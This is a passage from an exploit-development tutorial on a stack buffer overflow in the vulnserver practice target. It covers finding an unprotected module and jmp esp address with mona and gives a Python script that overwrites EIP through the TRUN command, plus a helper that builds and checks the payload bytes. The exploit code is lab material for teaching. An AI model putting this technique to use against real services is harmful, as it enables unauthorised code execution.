Finding the Right Module: After the bad characters, we have to find the right module. We're looking for a DLL or something similar inside the program that has no memory protections, meaning no DEP, no ASLR, no SEH protection (SafeSEH), etc.
Run the vulnserver and Immunity Debugger, type:
!mona modules
Notice the module whose protection columns all read "False", i.e. it has no protection. We're going to use the opcode "FFE4" (jmp esp) as our pointer, so the return address jumps to our malicious shellcode.
Then go back to Immunity Debugger and find the return address: "625011af".
Find the jump point in the module with:
!mona jmp -r ESP -m "essfunc.dll"
and press Enter.
We have to create another Python script that sends the payload to the jump point, then break there.
5-module.py
#!/usr/bin/python3
# Run with: python3 5-module.py
import sys
import socket

# Built as bytes, not str: in Python 3 a str holding \x80-\xff is turned into
# two UTF-8 bytes per character by .encode(), which corrupts the payload.
badchars = (b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13"
            b"\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26"
            b"\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39"
            b"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c"
            b"\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
            b"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72"
            b"\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85"
            b"\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
            b"\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab"
            b"\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe"
            b"\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
            b"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4"
            b"\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7"
            b"\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
# 2003 bytes reach EIP; the next 4 bytes overwrite it with the jmp esp address
# 625011af found in essfunc.dll, written little-endian. The bytes after that
# land where ESP points, so they are what the jump executes.
shellcode = b"A" * 2003 + b"\xaf\x11\x50\x62" + badchars
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Change this IP address and port to match the vulnserver host
    s.connect(('192.168.4.104', 9999))
    payload = b"TRUN /.:/" + shellcode
    s.send(payload)
    s.close()
except OSError:
    print("Error connecting to server")
    sys.exit()
Then go back to Immunity Debugger, navigate to the return address 625011af and find our jump code, FFE4. This is exactly what we want. Hit F2 to set a breakpoint on it.
Notice that the breakpoint is highlighted in blue. With the breakpoint set, we are still going to overflow the buffer, but when execution hits this specific spot, the jump instruction, it is not going to jump on to further instructions.
It is going to break the program and pause right here, waiting for further instruction from us.
Then execute the script. We hit the breakpoint at FFE4 and the program is paused, which means we control EIP.
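As an added example (not part of the walkthrough), the following builds the same TRUN payload as raw bytes and checks the two things that silently go wrong in a Python 3 port of the script above: the return address must be written little-endian, and a str-based payload passed through .encode() is UTF-8 encoded, so every byte from \x80 upward reaches the server as two bytes. The offset (2003), the address (625011af) and the TRUN prefix come from the walkthrough; the set of bad characters is assumed here to be just the null byte.

```python
import struct

OFFSET = 2003          # bytes before EIP, from the earlier offset-finding step
JMP_ESP = 0x625011af   # jmp esp (FF E4) in essfunc.dll, as reported by mona
BAD_CHARS = frozenset({0x00})  # ASSUMPTION: null is the only excluded byte
PREFIX = b"TRUN /.:/"


def pack_address(addr: int) -> bytes:
    """x86 is little-endian, so 0x625011af goes on the wire as af 11 50 62."""
    return struct.pack("<I", addr)


def bad_bytes(blob: bytes, bad=BAD_CHARS) -> list:
    """Offsets of every byte the target would mangle (checked before sending)."""
    return [i for i, b in enumerate(blob) if b in bad]


def build_payload(tail: bytes = b"") -> bytes:
    """Command prefix, padding up to EIP, the return address, then the bytes
    that land at ESP (shellcode in a later step, test bytes here)."""
    ret = pack_address(JMP_ESP)
    if bad_bytes(ret):
        raise ValueError("return address contains a bad character")
    return PREFIX + b"A" * OFFSET + ret + tail


def eip_value(payload: bytes) -> int:
    """Read back the dword that overwrites EIP, to confirm the offset."""
    start = len(PREFIX) + OFFSET
    return struct.unpack("<I", payload[start:start + 4])[0]


def str_encode_pitfall(addr: int) -> bytes:
    """What a str-based script actually sends: the same four characters as a
    Python 3 str, then .encode(). chr(0xaf) becomes the two bytes c2 af."""
    text = "".join(chr(b) for b in pack_address(addr))
    return text.encode()


if __name__ == "__main__":
    p = build_payload(b"\x90" * 16)
    print("EIP will be %08x" % eip_value(p))
    print("str.encode() version of the address:", str_encode_pitfall(JMP_ESP))
```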